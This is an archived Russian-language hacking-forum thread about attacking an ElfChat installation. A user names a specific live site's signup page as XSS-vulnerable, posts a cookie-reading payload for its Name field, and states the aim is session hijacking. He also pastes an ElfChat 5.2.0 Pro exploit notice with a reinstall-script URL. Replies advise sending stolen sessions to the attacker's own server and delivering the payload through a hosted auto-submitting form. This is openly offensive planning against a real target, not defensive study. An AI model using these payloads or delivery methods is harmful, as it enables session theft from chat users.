PDA

Просмотр полной версии : Elf xss


abraman
02.10.2015, 23:47
http://yourspier.com/temp/ElfChat/signup.php

Уязвимость присутствует в скрипте для регистрации в поле "Name"


Code:
">alert("cookie: "+document.cookie);

(работает в firefox)

Задача перехват сессии, однако не совсем понятно каким образом можно сгенерировать вредоносную ссылку.

Также по теме имеется exploit


HTML:
ElfChat 5.2.0 Pro Reinstall SCript EXploits
===========================================
Author : indoushka
Vondor : http://elfchat.ru/
Dork: 2011 Elfet - ElfChat 5.2.0 Pro
==========================


XSS Reflected - Jquery 1.4.2


$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});





alert('xss
reflected - jquery 1.4.2 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com');




===

and :

/ElfChat/js/datepicker/js/jquery.js
/ElfChat/js/min/jquery.js

Reinstall SCript :

http://127.0.0.1/ElfChat/install/index.php?act=settings

cheebeez
03.10.2015, 03:38
[DEL 56]

abraman
03.10.2015, 16:35
cheebeez said:
↑ (https://antichat.live/posts/3898077/)
В XSS суешь скрипт который будет делать запрос на
http://твой_сайт/чужая_сессия
, затем изучаешь логи на своем сайте.


По видимому ты не понял в данном случае XSS реализуется не через GET, а через POST запрос. Тут нашел инфы http://www.enigmagroup.org/articles/view/Web Hacking/118-XSS-and-post-method (http://www.enigmagroup.org/articles/view/Web%20Hacking/118-XSS-and-post-method) Т.е. мы заливаем html exploit код которого указан выше меняем линки и даем link на html exploit ?

ocheretko
04.10.2015, 03:26
Как один из вариантов:

Вам нужно сделать форму с ява скриптом и разместить ее на любом хостинге. Сделать так, чтобы при загрузке по событию onload автоматически нажмется сабмит.

В параметрах Вы прописываете експлоит.